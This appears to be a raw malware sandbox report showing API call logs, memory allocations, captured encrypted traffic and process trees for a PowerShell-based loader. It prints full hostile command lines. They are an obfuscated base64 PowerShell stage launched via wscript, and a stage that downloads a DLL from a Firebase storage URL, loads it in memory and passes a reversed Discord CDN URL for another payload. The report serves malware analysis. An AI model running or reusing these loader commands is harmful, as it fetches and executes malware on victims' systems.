 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received W
Data received Sfµtµ «÷b, ©N‚éÔþ½;“Ÿ°DOWNGRD ˆ\k…bˆ„³¤ËÜ[njŽ7ê‰m†ø1€@öîÀ ÿ 
Data received j
Data received ’
Data received ŽAŽ¡×µÈìÁ¯#\5 ÆW¼oÕšo]XMj>³Šiœñ_πù­ÞØþÝuœîãƒ.úù~û@ó†é9ÿG0E u¼ÀÒ:>knŠ½o°'Å&@äbœ"/ç°Ð0á!节í‰*§"ó±/1Lì»·âSkK°ÊìjsÝjFÛ ¶‘
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ~Šëp—›“ŒFí‰ò²3ËRý‰Ë÷t¶ë—ǪÅÄÚSØê }VZ×øõô >
Data received €
Data received ¾u§î ¸rÚ ù:˛ÃH ³‘ÁcG^…<Ž  {sPœžœbÏ" @ÂH¡ÿûþxޅØ&µbÃD–½E›O>¦)<-Ð<aUá…$Znp‰ÅÿuéˆS5ä>ü¼„ä1)MuˆÅÃ`7ÚЉ ‡ÇÇûŸ‡|BȱžÜV¦‚¼ÐÿÀÎàÖöаPݨpòf ¦ƒ<)"FoWî„ÀŽæ¥º/œ»Ê(†O…‰A¨ùSºûö|Ü%3‰ëÚˊ_Ώè‹K‚Ë´Yâñ)„úÙë$áí SÈê]ÒP.ãb±±ÈÑ©ï,۔6SÀP'bm©s!ô—T>ž|bS*ú<ƒ*"§q]'gÞµÙºˆ—ÖH˜“•]¬b l”¨tàÀšG\GƜ@•üBD¹³‚]ðÑ8eNÝ!Åޝ\Ž Ê Ï†1|@˜ÍMáÉôÔ÷=Œ÷ò>ätV'¸ƒõ¨µsKgò–DRSY£ÿ÷×óäœð¼Þu—‹òEè Yö^×fEw€j5Hâ¸U£î7]Àþåg‚¸²f˽3OñÅ ÈÅk6!—ÿ´ …p%= êx°Ù  G6Üÿ48­²vfë©4_A”s¢»³2[Q%ßfù~-BÓÆ»ó×W라(0+ÌAti—¥·ÚÄ<6!Ðý旄 ?®D¦dá(œöÚù¦±¿I ¬DÇ\0 6˜r‰óÖïÍùÁì§2üŽ% Ë>E9v»ú¿eRšl…‘ž‚TƺrðÓ»c)|3œŠm6‹Îó…ÅÇèq¹ï3"ìïI1©ˆmKö>,‰äd{B¥†ûA•–
Data sent }fµt¦âlÈà_òCÈzŸÐýÌYˆHV$‚/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBA—&ý¿eéIIn¶$¥1)¥îžÆ9dÄ#ÒÂ*ÛZ¿4ìÛaÎ@ãÑúD`kûé½aʕólb¨Qeè?ºôX¨ 0JÊàH^Š×ÑKsój½ç.P¯§ƒD6ÛMª§"Ü}Hîrãe1ÊH6N <
Data sent Ðßå)AÑ«Ö½æA0pcNÿt;A†­“ ÆE=Ï ©s2[–_Nnñ4žpá x&? Q‰Óΰ¼€÷g±Gá9¦…ÓW5†.´q¿«6Ü°Bkù(¢V°¾.©Vø²ù~Í°®â~ü ÚhLB· DƒR$ÌQçRwø‡F…æ24¸~ Gÿ…¬tĀî”pqÿ:OñÎ'’ÌN”Ä&ÇÎýœC”÷ó»ôV¹Ñ/è"ì_T)ö¦×Þ}°ƒmãL‘Ö?•È¼4÷ό
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

send

 buffer: }fµt¦âlÈà_òCÈzŸÐýÌYˆHV$‚/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1424
sent: 134
1 134 0

send

 buffer: FBA—&ý¿eéIIn¶$¥1)¥îžÆ9dÄ#ÒÂ*ÛZ¿4ìÛaÎ@ãÑúD`kûé½aʕólb¨Qeè?ºôX¨ 0JÊàH^Š×ÑKsój½ç.P¯§ƒD6ÛMª§"Ü}Hîrãe1ÊH6N <
socket: 1424
sent: 134
1 134 0

send

 buffer: Ðßå)AÑ«Ö½æA0pcNÿt;A†­“ ÆE=Ï ©s2[–_Nnñ4žpá x&? Q‰Óΰ¼€÷g±Gá9¦…ÓW5†.´q¿«6Ü°Bkù(¢V°¾.©Vø²ù~Í°®â~ü ÚhLB· DƒR$ÌQçRwø‡F…æ24¸~ Gÿ…¬tĀî”pqÿ:OñÎ'’ÌN”Ä&ÇÎýœC”÷ó»ôV¹Ñ/è"ì_T)ö¦×Þ}°ƒmãL‘Ö?•È¼4÷ό
socket: 1424
sent: 213
1 213 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\envifa.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"
parent_process wscript.exe martian_process powershell -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ